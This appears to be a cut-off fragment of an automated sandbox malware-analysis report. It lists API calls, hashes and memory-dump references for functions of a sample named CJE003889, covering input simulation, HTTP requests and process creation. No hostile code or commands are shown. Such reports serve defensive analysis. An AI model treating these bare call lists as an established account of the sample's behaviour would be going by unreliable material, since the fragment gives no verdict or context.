                                                          • Opcode ID: dd2bb9d27d3a5854f0f2818c6ee2df93ae9a098005eff15e2999eaa7aabb5bfa
                                                          • Instruction ID: fc5b751363a9580baac8c43acbb6d8414e230ab85a77c17f10c4be47343fe9e0
                                                          • Opcode Fuzzy Hash: dd2bb9d27d3a5854f0f2818c6ee2df93ae9a098005eff15e2999eaa7aabb5bfa
                                                          • Instruction Fuzzy Hash: 4211203A6883577AFA213624EC0AEE737ACDB15720F200016FB10A40F1FE7159556A59
                                                          APIs
                                                          • VariantInit.OLEAUT32(?), ref: 00CD88D7
                                                          • CoInitialize.OLE32(00000000), ref: 00CD8904
                                                          • CoUninitialize.OLE32 ref: 00CD890E
                                                          • GetRunningObjectTable.OLE32(00000000,?), ref: 00CD8A0E
                                                          • SetErrorMode.KERNEL32(00000001,00000029), ref: 00CD8B3B
                                                          • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00CF2C0C), ref: 00CD8B6F
                                                          • CoGetObject.OLE32(?,00000000,00CF2C0C,?), ref: 00CD8B92
                                                          • SetErrorMode.KERNEL32(00000000), ref: 00CD8BA5
                                                          • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00CD8C25
                                                          • VariantClear.OLEAUT32(?), ref: 00CD8C35
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                          • String ID:
                                                          • API String ID: 2395222682-0
                                                          • Opcode ID: 1bdcd26ea8b61509ee031cfeab80e5735520c9ea9461054afadc40610f2ff1b1
                                                          • Instruction ID: 8e53de7cebe94dbe501c266b5883d17f13c7f91f30abe5dd8c9c3f6666742e53
                                                          • Opcode Fuzzy Hash: 1bdcd26ea8b61509ee031cfeab80e5735520c9ea9461054afadc40610f2ff1b1
                                                          • Instruction Fuzzy Hash: B3C116B1604305AFD700DF65C88492BB7E9FF89748F00491EF6999B251DB71ED0ACB52
                                                          APIs
                                                          • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00CC7A6C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: ArraySafeVartype
                                                          • String ID:
                                                          • API String ID: 1725837607-0
                                                          • Opcode ID: e95cb02a09b9a8e65fe9412cdcb58e0a17df4566d0fadfb9f1fcd989ab6e4adb
                                                          • Instruction ID: b4b34ebbd7d92f7f82f301ab01670dd40d606aa797ec4783bc3704d1a4324ef3
                                                          • Opcode Fuzzy Hash: e95cb02a09b9a8e65fe9412cdcb58e0a17df4566d0fadfb9f1fcd989ab6e4adb
                                                          • Instruction Fuzzy Hash: 27B18C7190421A9FDB00DFA5C894FBEB7B8EF09321F204569E511AB291D734EA41DF90
                                                          APIs
                                                          • GetCurrentThreadId.KERNEL32 ref: 00CC11F0
                                                          • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00CC0268,?,00000001), ref: 00CC1204
                                                          • GetWindowThreadProcessId.USER32(00000000), ref: 00CC120B
                                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00CC0268,?,00000001), ref: 00CC121A
                                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 00CC122C
                                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00CC0268,?,00000001), ref: 00CC1245
                                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00CC0268,?,00000001), ref: 00CC1257
                                                          • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00CC0268,?,00000001), ref: 00CC129C
                                                          • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00CC0268,?,00000001), ref: 00CC12B1
                                                          • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00CC0268,?,00000001), ref: 00CC12BC
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                          • String ID:
                                                          • API String ID: 2156557900-0
                                                          • Opcode ID: fdbd5778d61df37a825660ee19b8550d567d97eeb82be877ff6ef71962e6f055
                                                          • Instruction ID: c1c1ec1d01052df09f07a92dbb0d2a13fe0fb0d0f1a8be44b20154fe4a6a69b2
                                                          • Opcode Fuzzy Hash: fdbd5778d61df37a825660ee19b8550d567d97eeb82be877ff6ef71962e6f055
                                                          • Instruction Fuzzy Hash: C631AC79600304EBDF209F56ED88FAD37A9AF66311F19812DFD11CA2A1D7B49E418B60
                                                          APIs
                                                          • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00C6FAA6
                                                          • OleUninitialize.OLE32(?,00000000), ref: 00C6FB45
                                                          • UnregisterHotKey.USER32(?), ref: 00C6FC9C
                                                          • DestroyWindow.USER32(?), ref: 00CA45D6
                                                          • FreeLibrary.KERNEL32(?), ref: 00CA463B
                                                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00CA4668
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                          • String ID: close all
                                                          • API String ID: 469580280-3243417748
                                                          • Opcode ID: 901ec510a184d8928ff0692902f4c7da3b776ed714c5c9e644261de13fd959aa
                                                          • Instruction ID: b6ab93cdabb2cb116c2a76895f83ca3ebeeb5d5bdb94a754afab7fb1ab60155b
                                                          • Opcode Fuzzy Hash: 901ec510a184d8928ff0692902f4c7da3b776ed714c5c9e644261de13fd959aa
                                                          • Instruction Fuzzy Hash: FEA16B30701212DFCB29EF14D9A5B69F364BF56704F1442ADE81AAB262CB70AD17DF50
                                                          APIs
                                                          • EnumChildWindows.USER32(?,00CBA439), ref: 00CBA377
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: ChildEnumWindows
                                                          • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                          • API String ID: 3555792229-1603158881
                                                          • Opcode ID: 1c71ff38e99b218cd1b40a8a2ee3d9a5562f2aed3301fbe5a0a4990edea2ad1c
                                                          • Instruction ID: f3bb5460d26324060a6692d3d3c998892d8a65e88addeddeb85af841ea3f2105
                                                          • Opcode Fuzzy Hash: 1c71ff38e99b218cd1b40a8a2ee3d9a5562f2aed3301fbe5a0a4990edea2ad1c
                                                          • Instruction Fuzzy Hash: DA91AA31504605EBCB08EFA4C482BEEF7B4FF04314F548119E899A7251DF31AA9DEBA5
                                                          APIs
                                                          • SetWindowLongW.USER32(?,000000EB), ref: 00C62EAE
                                                            • Part of subcall function 00C61DB3: GetClientRect.USER32(?,?), ref: 00C61DDC
                                                            • Part of subcall function 00C61DB3: GetWindowRect.USER32(?,?), ref: 00C61E1D
                                                            • Part of subcall function 00C61DB3: ScreenToClient.USER32(?,?), ref: 00C61E45
                                                          • GetDC.USER32 ref: 00C9CD32
                                                          • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00C9CD45
                                                          • SelectObject.GDI32(00000000,00000000), ref: 00C9CD53
                                                          • SelectObject.GDI32(00000000,00000000), ref: 00C9CD68
                                                          • ReleaseDC.USER32(?,00000000), ref: 00C9CD70
                                                          • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00C9CDFB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                          • String ID: U
                                                          • API String ID: 4009187628-3372436214
                                                          • Opcode ID: 755148400963ebe742cd82a3442de56336b8c6d68f8b075e0ef835239057781d
                                                          • Instruction ID: f3d3ba555d8fcb024f01a7284f8ada7eb202fa16038ab428192ef953ab7e78de
                                                          • Opcode Fuzzy Hash: 755148400963ebe742cd82a3442de56336b8c6d68f8b075e0ef835239057781d
                                                          • Instruction Fuzzy Hash: D471D032500605DFCF318F64C8C8AEA7BB5FF59321F14427AED659A2A6C7318E41DB60
                                                          APIs
                                                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00CD1A50
                                                          • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00CD1A7C
                                                          • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00CD1ABE
                                                          • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00CD1AD3
                                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00CD1AE0
                                                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00CD1B10
                                                          • InternetCloseHandle.WININET(00000000), ref: 00CD1B57
                                                            • Part of subcall function 00CD2483: GetLastError.KERNEL32(?,?,00CD1817,00000000,00000000,00000001), ref: 00CD2498
                                                            • Part of subcall function 00CD2483: SetEvent.KERNEL32(?,?,00CD1817,00000000,00000000,00000001), ref: 00CD24AD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                          • String ID:
                                                          • API String ID: 2603140658-3916222277
                                                          • Opcode ID: 1ca14a993c4e2f6158ef3ff8227ec2180cc7fefd53766d13e99ce308f1498b35
                                                          • Instruction ID: 3daec0bb58a720b5a82a0b3b8a4221031ae6d1d8af035a1b0e921f24c35f189b
                                                          • Opcode Fuzzy Hash: 1ca14a993c4e2f6158ef3ff8227ec2180cc7fefd53766d13e99ce308f1498b35
                                                          • Instruction Fuzzy Hash: 28417CB1501218BFEB119F61CC89FBE7BACEF08354F04812BFE159A241E7749E459BA0
                                                          APIs
                                                          • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00CEF910), ref: 00CD8D28
                                                          • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00CEF910), ref: 00CD8D5C
                                                          • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00CD8ED6
                                                          • SysFreeString.OLEAUT32(?), ref: 00CD8F00
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                          • String ID:
                                                          • API String ID: 560350794-0
                                                          • Opcode ID: d0172e04072808ea25b76877d77cb1ad3203b033b2c4861ef453a210f6c39391
                                                          • Instruction ID: fee23cea852011343bf950413c3c7a0d14a03f35a7b3fea58156b501778ad427
                                                          • Opcode Fuzzy Hash: d0172e04072808ea25b76877d77cb1ad3203b033b2c4861ef453a210f6c39391
                                                          • Instruction Fuzzy Hash: F6F15775A00209EFCF14DF94C884EAEB7B9FF49314F108499FA15AB251DB31AE4ACB50
                                                          APIs
                                                          • _memset.LIBCMT ref: 00CDF6B5
                                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00CDF848
                                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00CDF86C
                                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00CDF8AC
                                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00CDF8CE
                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00CDFA4A
                                                          • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00CDFA7C
                                                          • CloseHandle.KERNEL32(?), ref: 00CDFAAB
                                                          • CloseHandle.KERNEL32(?), ref: 00CDFB22
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                          • String ID:
                                                          • API String ID: 4090791747-0
                                                          • Opcode ID: d893cf31c98e8811bf4a4f8b9707e96fe3b85068297f4ea736d24c791373f5be
                                                          • Instruction ID: 044946ad810d45bf2363c5960e8a905d5f0776d568d0fa7a56baf8b3c18610a1
                                                          • Opcode Fuzzy Hash: d893cf31c98e8811bf4a4f8b9707e96fe3b85068297f4ea736d24c791373f5be
                                                          • Instruction Fuzzy Hash: 25E19D316042409FC724EF24C891B6ABBE5FF85314F14856EF99A9B3A2CB30DD46DB52
                                                          APIs
                                                            • Part of subcall function 00CC466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00CC3697,?), ref: 00CC468B
                                                            • Part of subcall function 00CC466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00CC3697,?), ref: 00CC46A4
                                                            • Part of subcall function 00CC4A31: GetFileAttributesW.KERNEL32(?,00CC370B), ref: 00CC4A32
                                                          • lstrcmpiW.KERNEL32(?,?), ref: 00CC4D40
                                                          • _wcscmp.LIBCMT ref: 00CC4D5A
                                                          • MoveFileW.KERNEL32(?,?), ref: 00CC4D75
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                          • String ID:
                                                          • API String ID: 793581249-0
                                                          • Opcode ID: 2d32979dde4adaaf90a72b924da53d5c100907a8b493818511ab03f27b3415be
                                                          • Instruction ID: b8c2577617842bd50712063310fc80427fd314219de096604b518005929fddc4
                                                          • Opcode Fuzzy Hash: 2d32979dde4adaaf90a72b924da53d5c100907a8b493818511ab03f27b3415be
                                                          • Instruction Fuzzy Hash: 145165B24083859BC724EBA0D891EDFB3ECAF84354F10492EF586D3151EF30A689D756
                                                          APIs
                                                          • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00CE86FF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: InvalidateRect
                                                          • String ID:
                                                          • API String ID: 634782764-0
                                                          • Opcode ID: 55cec5c82a82b1d6a7847ca624aab276a527c4d20d5e7ed498966db25cf35924
                                                          • Instruction ID: 719a4adb9cfbff9a75f44c2db9ab01fc3a587aab84738924a8064164ebd9de6a
                                                          • Opcode Fuzzy Hash: 55cec5c82a82b1d6a7847ca624aab276a527c4d20d5e7ed498966db25cf35924
                                                          • Instruction Fuzzy Hash: 465183305002C4FFDB309B26DC85FAD7BA9AB05720F604515F969EA1E1CF71AA88EB50
                                                          APIs
                                                          • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00C9C2F7
                                                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00C9C319
                                                          • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00C9C331
                                                          • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00C9C34F
                                                          • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00C9C370
                                                          • DestroyIcon.USER32(00000000), ref: 00C9C37F
                                                          • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00C9C39C
                                                          • DestroyIcon.USER32(?), ref: 00C9C3AB
                                                            • Part of subcall function 00CEA4AF: DeleteObject.GDI32(00000000), ref: 00CEA4E8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                          • String ID:
                                                          • API String ID: 2819616528-0
                                                          • Opcode ID: 64fa120ecf52f0fa030a9b98109b9bec36ceaabf5f888cb3e78700c5cee090ce
                                                          • Instruction ID: edd56e61233701a1f40a9a92b7898d05293e904ded753adfb30b0f0f4be4ef23
                                                          • Opcode Fuzzy Hash: 64fa120ecf52f0fa030a9b98109b9bec36ceaabf5f888cb3e78700c5cee090ce
                                                          • Instruction Fuzzy Hash: C2516A70600A49AFDB20DF25DC85FAA7BA5FB58310F104528F952D72A0D7B0EE91EB60
                                                          APIs
                                                            • Part of subcall function 00CBA82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 00CBA84C
                                                            • Part of subcall function 00CBA82C: GetCurrentThreadId.KERNEL32 ref: 00CBA853
                                                            • Part of subcall function 00CBA82C: AttachThreadInput.USER32(00000000,?,00CB9683,?,00000001), ref: 00CBA85A
                                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 00CB968E
                                                          • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00CB96AB
                                                          • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00CB96AE
                                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 00CB96B7
                                                          • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00CB96D5
                                                          • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00CB96D8
                                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 00CB96E1
                                                          • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00CB96F8
                                                          • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00CB96FB
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                          • String ID:
                                                          • API String ID: 2014098862-0
                                                          • Opcode ID: 1100bf969b33f3eabd5901fdcc6c55be824adae2744241361c0d168914e14cd9
                                                          • Instruction ID: 628f44deca064d12339fafdb5ff04ad0578bcd36509217a19d50c3cca70bf312
                                                          • Opcode Fuzzy Hash: 1100bf969b33f3eabd5901fdcc6c55be824adae2744241361c0d168914e14cd9
                                                          • Instruction Fuzzy Hash: 2911CEB1910618BFF6106B609C89FAE3F2DEB4C750F100429F244AB0E0C9F25C119AA4
                                                          APIs
                                                          • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00CB853C,00000B00,?,?), ref: 00CB892A
                                                          • HeapAlloc.KERNEL32(00000000,?,00CB853C,00000B00,?,?), ref: 00CB8931
                                                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00CB853C,00000B00,?,?), ref: 00CB8946
                                                          • GetCurrentProcess.KERNEL32(?,00000000,?,00CB853C,00000B00,?,?), ref: 00CB894E
                                                          • DuplicateHandle.KERNEL32(00000000,?,00CB853C,00000B00,?,?), ref: 00CB8951
                                                          • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00CB853C,00000B00,?,?), ref: 00CB8961
                                                          • GetCurrentProcess.KERNEL32(00CB853C,00000000,?,00CB853C,00000B00,?,?), ref: 00CB8969
                                                          • DuplicateHandle.KERNEL32(00000000,?,00CB853C,00000B00,?,?), ref: 00CB896C
                                                          • CreateThread.KERNEL32(00000000,00000000,00CB8992,00000000,00000000,00000000), ref: 00CB8986
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                          • String ID:
                                                          • API String ID: 1957940570-0
                                                          • Opcode ID: ce3138df1024fa88f72e218b420affa46d8da176aa91461c46ec13927babcfd9
